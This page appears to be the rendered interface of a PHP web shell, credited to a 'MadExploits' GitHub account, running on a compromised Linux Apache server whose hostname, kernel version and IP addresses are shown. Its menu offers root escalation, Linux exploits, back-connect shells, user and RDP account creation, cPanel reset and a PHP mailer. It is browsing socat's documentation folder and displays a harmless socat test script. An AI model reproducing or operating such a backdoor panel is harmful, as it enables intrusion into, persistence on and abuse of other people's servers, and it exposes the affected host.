Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els11.x86_64 #1 SMP Sun Nov 3 09:06:59 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.219.176.215
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
socat-1.7.3.2 /
[ HOME SHELL ]
Name
Size
Permission
Action
BUGREPORTS
746
B
-rw-r--r--
CHANGES
53.13
KB
-rw-r--r--
COPYING
17.67
KB
-rw-r--r--
COPYING.OpenSSL
6.13
KB
-rw-r--r--
DEVELOPMENT
8.29
KB
-rw-r--r--
EXAMPLES
16.47
KB
-rw-r--r--
FAQ
3.83
KB
-rw-r--r--
PORTING
3.02
KB
-rw-r--r--
README
11.37
KB
-rw-r--r--
SECURITY
1.81
KB
-rw-r--r--
daemon.sh
903
B
-rwxr-xr-x
ftp.sh
4.12
KB
-rwxr-xr-x
gatherinfo.sh
4.03
KB
-rwxr-xr-x
mail.sh
2.02
KB
-rwxr-xr-x
proxy.sh
1.98
KB
-rwxr-xr-x
proxyecho.sh
1.19
KB
-rwxr-xr-x
readline-test.sh
1.25
KB
-rwxr-xr-x
readline.sh
689
B
-rwxr-xr-x
socat_buildscript_for_android....
3.5
KB
-rwxr-xr-x
socks4a-echo.sh
2.51
KB
-rwxr-xr-x
socks4echo.sh
2.3
KB
-rwxr-xr-x
test.sh
390.77
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readline-test.sh
#! /bin/bash # source: readline-test.sh # Copyright Gerhard Rieger and contributors (see file CHANGES) # Published under the GNU General Public License V.2, see file COPYING # script that simulates a simple program with authentication. # is just for testing the readline features # perform the test with something like: # ./socat readline,history=$HOME/.history,noecho='^Password: ' system:./readline-test.sh,pty,setsid,ctty,stderr,sigint,sigquit,echo=0,raw BANNER='readline feature test program' USERPROMPT='Authentication required\nUsername: ' PWDPROMPT='Password: ' PROMPT='prog> ' # degenerated user database CREDUSER="user" CREDPASS="password" if [ $(echo "x\c") = "x" ]; then ECHO="echo" elif [ $(echo -e "x\c") = "x" ]; then ECHO="echo -e" fi #trap "$ECHO $0 got SIGINT" INT trap "$ECHO $0 got SIGINT" INT trap "$ECHO $0 got SIGQUIT" QUIT # print banner $ECHO "$BANNER" # on (some) ksh read -p does not mean prompt $ECHO "$USERPROMPT\c"; read -r USERNAME $ECHO "$PWDPROMPT\c"; read -rs PASSWORD $ECHO if [ "$USERNAME" != "$CREDUSER" -o "$PASSWORD" != "$CREDPASS" ]; then $ECHO "Authentication failed" >&2 exit -1 fi while $ECHO "$PROMPT\c"; read -r COMMAND; do if [ "$COMMAND" = "exit" ]; then break; fi $ECHO "executing $COMMAND" done
Close